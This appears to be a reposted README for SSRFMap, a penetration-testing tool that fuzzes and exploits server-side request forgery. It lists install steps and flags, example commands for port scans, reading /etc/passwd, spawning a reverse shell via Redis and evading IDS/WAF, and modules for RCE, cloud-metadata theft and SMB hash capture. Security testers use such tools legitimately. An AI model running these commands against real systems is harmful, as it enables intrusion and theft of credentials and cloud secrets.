SSRFMap - Automatic SSRF Fuzzer And Exploitation Tool

SSRFMap - Automatic SSRF Fuzzer and Exploitation Tool

SSRFMap - Automatic SSRF Fuzzer and Exploitation Tool


SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Basic install from the Github repository.

git clone https://ift.tt/2NdQvve
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py

Usage: 

ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
                  [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
                  [--ssl [SSL]] [--level [LEVEL]]


Optional arguments:

  -h, --help          show this help message and exit
  -r REQFILE          SSRF Request file
  -p PARAM            SSRF Parameter to target
  -m MODULES          SSRF Modules to enable
  -l HANDLER          Start an handler for a reverse shell
  --lhost LHOST       LHOST reverse shell
  --lport LPORT       LPORT reverse shell
  --uagent USERAGENT  User Agent to use
  --ssl [SSL]         Use HTTPS without verification
  --level [LEVEL]     Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

A quick way to test the framework can be done with data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

Name    Description
fastcgi    FastCGI RCE
redis    Redis RCE
github    Github Enterprise RCE < 2.8.7
zabbix    Zabbix RCE
mysql    MySQL Command execution
docker    Docker Infoleaks via API
smtp    SMTP send mail
portscan Scan ports for the host
networkscan HTTP Ping sweep over the network
readfiles Read files such as /etc/passwd
alibaba Read files from the provider (e.g: meta-data, user-data)
aws Read files from the provider (e.g: meta-data, user-data)
gce Read files from the provider (e.g: meta-data, user-data)
digitalocean Read files from the provider (e.g: meta-data, user-data)
socksproxy SOCKS4 Proxy
smbhash Force an SMB authentication via a UNC Path
tomcat Bruteforce attack against Tomcat Manager

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